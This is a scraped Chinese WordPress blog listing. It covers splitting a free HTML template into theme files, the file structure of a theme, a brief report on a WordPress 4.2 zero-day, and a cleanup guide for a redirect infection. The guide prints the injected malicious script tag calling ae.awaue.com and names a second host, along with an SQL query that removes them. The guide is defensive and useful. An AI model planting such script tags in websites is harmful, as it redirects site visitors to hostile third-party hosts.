accesskey="1" title="">Home</a></li> <li><a href="#" accesskey="2" title="">Blog</a></li> <li><a href="#" accesskey="3" title="">Photos</a></li> <li><a href="#" accesskey="4" title="">About</a></li> <li><a href="#" accesskey="5" title="">Contact</a></li> </ul> </div> </div> <!-- header.php文件截断 --> <div id="gallery"> <div id="top-photo"> <p><a href="#"><img src="images/img08.jpg" alt="" width="830" height="300" /></a></p> </div> </div> <!-- start page --> <div id="page"> <!-- start content --> <div id="content"> <div class="post"> <h1 class="title">Welcome to My Website</h1> <p class="byline"><small>Posted on August 25th, 2007 by <a href="#">admin</a> | <a href="#">Edit</a></small></p> <div class="entry"> <p><strong>Nature's Charm</strong> is a free template from <a href="http://freecsstemplates.org/">Free CSS Templates</a> released under a <a href="http://creativecommons.org/lic ... ative Commons Attribution 2.5 License</a>. The flower photo is fromt <a href="http://www.pdphoto.org/%26quot ... t%3B. You're free to use this template for both commercial or personal use. I only ask that you link back to <a href="http://freecsstemplates.org/">my site</a> in some way. Enjoy :)</p> </div> <p class="meta"><a href="#" class="more">Read More</a> <a href="#" class="comments">Comments (33)</a></p> </div> <div class="post"> <h2 class="title">Risus Pellentesque Pharetra</h2> <p class="byline"><small>Posted on August 25th, 2007 by <a href="#">admin</a> | <a href="#">Edit</a></small></p> <div class="entry"> <blockquote> <p>“Praesent augue mauris, accumsan eget, ornare quis, consequat malesuada, leo.”</p> </blockquote> <p>Maecenas pede nisl, elementum eu, ornare ac, malesuada at, erat. Proin gravida orci porttitor enim accumsan lacinia. Donec condimentum, urna non molestie semper, ligula enim ornare nibh, quis laoreet eros quam eget ante.</p> </div> <p class="meta"><a href="#" class="more">Read More</a> <a href="#" class="comments">Comments (33)</a></p> </div> </div> <!-- index.php内容区 --> <!-- sidebar.php侧边栏区 --> <div id="sidebar"> <ul> <li> <h2>Categories</h2> <ul> <li><a href="#">Aliquam libero</a></li> <li><a href="#">Consectetuer adipiscing elit</a></li> <li><a href="#">metus aliquam pellentesque</a></li> <li><a href="#">Suspendisse iaculis mauris</a></li> <li><a href="#">Urnanet non molestie semper</a></li> <li><a href="#">Proin gravida orci porttitor</a></li> </ul> </li> <li> <h2>Archives</h2> <ul> <li><a href="#">September</a> (23)</li> <li><a href="#">August</a> (31)</li> <li><a href="#">July</a> (31)</li> <li><a href="#">June</a> (30)</li> <li><a href="#">May</a> (31)</li> <li><a href="#">April</a> (30)</li> <li><a href="#">March</a> (31)</li> <li><a href="#">February</a> (28)</li> <li><a href="#">January</a> (31)</li> </ul> </li> </ul> </div> <!-- sidebar.php结束 --> </div> <div style="clear: both; height: 30px"> </div> <!-- end page --> <div id="footer"> <p>©2007 All Rights Reserved. • Designed by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a></p> </div> </body> </html>
找到下面这段说明:
<!-- header.php文件截断 -->
在主题根部新建文件,改名为header.php,然后把上门的说明标签以上的内容全部复制到header.php里面。然后再分别新建个index.php,footer.php,sidebar.php,style.css。再找到其中两个标签!
<!-- header.php文件截断 -->
<!-- index.php内容区 -->
把标签内的代码全部复制进index.php里面,然后再查找
<!-- sidebar.php侧边栏区 -->
<!-- sidebar.php结束 -->
重复上面的步骤,把中间的代码复制到新建的sidebar.php文件。最后一步把:
</div> <div style="clear: both; height: 30px"> </div> <!-- end page --> <div id="footer"> <p>©2007 All Rights Reserved. • Designed by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a></p> </div> </body> </html>
这段代码复制进新建的footer.php里面,把default.css改名为style.css。你点击外观→主题,是不是多了一个名称为1的主题?点击启用,回到首页是不是乱七八糟的,乱七八糟就对了,因为该主题纯粹是显示了index.php的html代码。很多东西都没关联起来
下面是教材中的全部代码:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DT ... gt%3B <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <title>Nature's Charm by Free CSS Templates</title> <meta name="keywords" content="" /> <meta name="description" content="" /> <link href="default.css" rel="stylesheet" type="text/css" media="screen" /> </head> <body> <!-- start header --> <div id="header"> <div id="logo"> <h1><a href="#">nature's charm </a></h1> <h2><a href="http://www.freecsstemplates.org/">By Free CSS Templates</a></h2> </div> <div id="menu"> <ul> <li class="active"><a href="#" accesskey="1" title="">Home</a></li> <li><a href="#" accesskey="2" title="">Blog</a></li> <li><a href="#" accesskey="3" title="">Photos</a></li> <li><a href="#" accesskey="4" title="">About</a></li> <li><a href="#" accesskey="5" title="">Contact</a></li> </ul> </div> </div> <!-- header.php文件截断 --> <div id="gallery"> <div id="top-photo"> <p><a href="#"><img src="images/img08.jpg" alt="" width="830" height="300" /></a></p> </div> </div> <!-- start page --> <div id="page"> <!-- start content --> <div id="content"> <div class="post"> <h1 class="title">Welcome to My Website</h1> <p class="byline"><small>Posted on August 25th, 2007 by <a href="#">admin</a> | <a href="#">Edit</a></small></p> <div class="entry"> <p><strong>Nature's Charm</strong> is a free template from <a href="http://freecsstemplates.org/">Free CSS Templates</a> released under a <a href="http://creativecommons.org/lic ... ative Commons Attribution 2.5 License</a>. The flower photo is fromt <a href="http://www.pdphoto.org/%26quot ... t%3B. You're free to use this template for both commercial or personal use. I only ask that you link back to <a href="http://freecsstemplates.org/">my site</a> in some way. Enjoy :)</p> </div> <p class="meta"><a href="#" class="more">Read More</a> <a href="#" class="comments">Comments (33)</a></p> </div> <div class="post"> <h2 class="title">Risus Pellentesque Pharetra</h2> <p class="byline"><small>Posted on August 25th, 2007 by <a href="#">admin</a> | <a href="#">Edit</a></small></p> <div class="entry"> <blockquote> <p>“Praesent augue mauris, accumsan eget, ornare quis, consequat malesuada, leo.”</p> </blockquote> <p>Maecenas pede nisl, elementum eu, ornare ac, malesuada at, erat. Proin gravida orci porttitor enim accumsan lacinia. Donec condimentum, urna non molestie semper, ligula enim ornare nibh, quis laoreet eros quam eget ante.</p> </div> <p class="meta"><a href="#" class="more">Read More</a> <a href="#" class="comments">Comments (33)</a></p> </div> </div> <!-- index.php内容区 --> <!-- sidebar.php侧边栏区 --> <div id="sidebar"> <ul> <li> <h2>Categories</h2> <ul> <li><a href="#">Aliquam libero</a></li> <li><a href="#">Consectetuer adipiscing elit</a></li> <li><a href="#">metus aliquam pellentesque</a></li> <li><a href="#">Suspendisse iaculis mauris</a></li> <li><a href="#">Urnanet non molestie semper</a></li> <li><a href="#">Proin gravida orci porttitor</a></li> </ul> </li> <li> <h2>Archives</h2> <ul> <li><a href="#">September</a> (23)</li> <li><a href="#">August</a> (31)</li> <li><a href="#">July</a> (31)</li> <li><a href="#">June</a> (30)</li> <li><a href="#">May</a> (31)</li> <li><a href="#">April</a> (30)</li> <li><a href="#">March</a> (31)</li> <li><a href="#">February</a> (28)</li> <li><a href="#">January</a> (31)</li> </ul> </li> </ul> </div> <!-- sidebar.php结束 --> </div> <div style="clear: both; height: 30px"> </div> <!-- end page --> <div id="footer"> <p>©2007 All Rights Reserved. • Designed by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a></p> </div> </body> </html>
找到下面这段说明:
<!-- header.php文件截断 -->
在主题根部新建文件,改名为header.php,然后把上门的说明标签以上的内容全部复制到header.php里面。然后再分别新建个index.php,footer.php,sidebar.php,style.css。再找到其中两个标签!
<!-- header.php文件截断 -->
<!-- index.php内容区 -->
把标签内的代码全部复制进index.php里面,然后再查找
<!-- sidebar.php侧边栏区 -->
<!-- sidebar.php结束 -->
重复上面的步骤,把中间的代码复制到新建的sidebar.php文件。最后一步把:
</div> <div style="clear: both; height: 30px"> </div> <!-- end page --> <div id="footer"> <p>©2007 All Rights Reserved. • Designed by <a href="http://www.freecsstemplates.org/">Free CSS Templates</a></p> </div> </body> </html>
这段代码复制进新建的footer.php里面,把default.css改名为style.css。你点击外观→主题,是不是多了一个名称为1的主题?点击启用,回到首页是不是乱七八糟的,乱七八糟就对了,因为该主题纯粹是显示了index.php的html代码。很多东西都没关联起来 收起阅读 »
wordpress教材的准备与下载
做一个wordpress博客主题其实不需要多少专业的web前端开发知识,只需要具备以下知识点就行。当然,不会也没关系,不过我还是推荐先去学习一下这些知识,不然制作起来会也别吃力!
wordpress主题制作所需知识:
1.html标签的使用,起码要能看懂html代码。
2.css样式表使用,起码要知道什么是css,怎么调用。
3.一定的耐心,其实我觉得这点是最重要的,wordpress主题制作不像很多人想象的那般有趣,其实制作过程是很枯燥无味的。做什么都好,只要你坚持下来,你总会成功的。
编程工具:个人推荐webstom,的确是开发神器。刚接触新手的可以用DW更好,不过我更倾向于前者。
教学教材:点击下载 这是我在网上随便找的简单博客个人主题。就拿它来做教材呗。
我会在以后的教程中使用教材提供主题,一步步的讲解wordpress主题制作的各类知识。
做一个wordpress博客主题其实不需要多少专业的web前端开发知识,只需要具备以下知识点就行。当然,不会也没关系,不过我还是推荐先去学习一下这些知识,不然制作起来会也别吃力!
wordpress主题制作所需知识:
1.html标签的使用,起码要能看懂html代码。
2.css样式表使用,起码要知道什么是css,怎么调用。
3.一定的耐心,其实我觉得这点是最重要的,wordpress主题制作不像很多人想象的那般有趣,其实制作过程是很枯燥无味的。做什么都好,只要你坚持下来,你总会成功的。
编程工具:个人推荐webstom,的确是开发神器。刚接触新手的可以用DW更好,不过我更倾向于前者。
教学教材:点击下载 这是我在网上随便找的简单博客个人主题。就拿它来做教材呗。
我会在以后的教程中使用教材提供主题,一步步的讲解wordpress主题制作的各类知识。 收起阅读 »
认识wordpress网站文件结构
主页/首页:index.php(必须有)
样式表:style.css(必须有)
404页:404.php(404页面)
函数模版:functions.php(用于注菜单,小工具以及一些自定义功能)
头部文件:header.php(公共调用的顶部代码文件)
底部文件:footer.php(公共调用的底部代码文件,常用于放置js文件以及主题版权信息)
侧边栏:sidebar.php(博客边栏)
单文章页:single.php(单篇文章样式)
文章分类页:category.php(文章归档分类页面文件)
单页面:page.php
日期页面:date.php
搜索页面:saerch.php
标签页:tag.php
评论模块:comments.php
主题缩略图:screenshot.png
一个wordpress主题会用到的模版大多数都在上面了,下一讲我们开始一个个讲解各个页面模版的详细使用方法。
WordPress社区合作站点wordpress中文网提供文字
主页/首页:index.php(必须有)
样式表:style.css(必须有)
404页:404.php(404页面)
函数模版:functions.php(用于注菜单,小工具以及一些自定义功能)
头部文件:header.php(公共调用的顶部代码文件)
底部文件:footer.php(公共调用的底部代码文件,常用于放置js文件以及主题版权信息)
侧边栏:sidebar.php(博客边栏)
单文章页:single.php(单篇文章样式)
文章分类页:category.php(文章归档分类页面文件)
单页面:page.php
日期页面:date.php
搜索页面:saerch.php
标签页:tag.php
评论模块:comments.php
主题缩略图:screenshot.png
一个wordpress主题会用到的模版大多数都在上面了,下一讲我们开始一个个讲解各个页面模版的详细使用方法。
WordPress社区合作站点wordpress中文网提供文字 收起阅读 »
WordPress 4.2现零日漏洞 官方已修复
零日漏洞允许攻击者将代码插入到网站的HTML内容。通过将恶意代码嵌入到博客的底部或文章后默认显示评论的部分,攻击者可以更改密码、 添加新管理员,执行任何其他管理员能执行的操作。安全公司公布了攻击演示代码和视频。
零日漏洞允许攻击者将代码插入到网站的HTML内容。通过将恶意代码嵌入到博客的底部或文章后默认显示评论的部分,攻击者可以更改密码、 添加新管理员,执行任何其他管理员能执行的操作。安全公司公布了攻击演示代码和视频。 收起阅读 »
WordPress重定向漏洞
- <script src="http://ae.awaue.com/7"></script>
症状:
浏览你网站文章的用户可能被重定向的第三方网站。(我今天遇到过一次,开始还纳闷我是点了什么跳到一个不认识的网站去的)
也可能被重定向到googlesearch.com,不过这个已被禁用。
但好在最后还是依赖(mt)自己的wiki解决了这个问题,我绝非第一个遇到这问题,以后可能会复发,别的WPer也可能遇到,留个存档,出问题好回查。
解决方案如下,范讲一下,不只针对(mt)主机:
登录你主机的管理后台,进入数据库管理,也就是mysqladmin
在左边列表里找到你的wordpress所在数据库,如db_blog
点击进入后,在顶部找到”SQL”一项,点击
然后我们在输入框里输入以下语句,目的查找wp_posts里所有信息,并替换掉其中有害信息:
- UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ae.awaue.com/7"></script>', ' ')
接下来运行这段语句
最后看一下影响了多少行,如果是0,说明你还没中招。我的跑了一下共替换了1200多条……
需要注意的是:上面的例子语句是举的默认情况,如果你的表名不是以wp_开头的,请换成你自己的,不要直接复制粘贴。
目前已发现的可疑脚本有以下两个:
- ae.awaue.com/7
- ie.eracou.com/3
如果未来发现有新的可疑脚本,请随时留意这里的更新
- <script src="http://ae.awaue.com/7"></script>
症状:
浏览你网站文章的用户可能被重定向的第三方网站。(我今天遇到过一次,开始还纳闷我是点了什么跳到一个不认识的网站去的)
也可能被重定向到googlesearch.com,不过这个已被禁用。
但好在最后还是依赖(mt)自己的wiki解决了这个问题,我绝非第一个遇到这问题,以后可能会复发,别的WPer也可能遇到,留个存档,出问题好回查。
解决方案如下,范讲一下,不只针对(mt)主机:
登录你主机的管理后台,进入数据库管理,也就是mysqladmin
在左边列表里找到你的wordpress所在数据库,如db_blog
点击进入后,在顶部找到”SQL”一项,点击
然后我们在输入框里输入以下语句,目的查找wp_posts里所有信息,并替换掉其中有害信息:
- UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ae.awaue.com/7"></script>', ' ')
接下来运行这段语句
最后看一下影响了多少行,如果是0,说明你还没中招。我的跑了一下共替换了1200多条……
需要注意的是:上面的例子语句是举的默认情况,如果你的表名不是以wp_开头的,请换成你自己的,不要直接复制粘贴。
目前已发现的可疑脚本有以下两个:
- ae.awaue.com/7
- ie.eracou.com/3
如果未来发现有新的可疑脚本,请随时留意这里的更新 收起阅读 »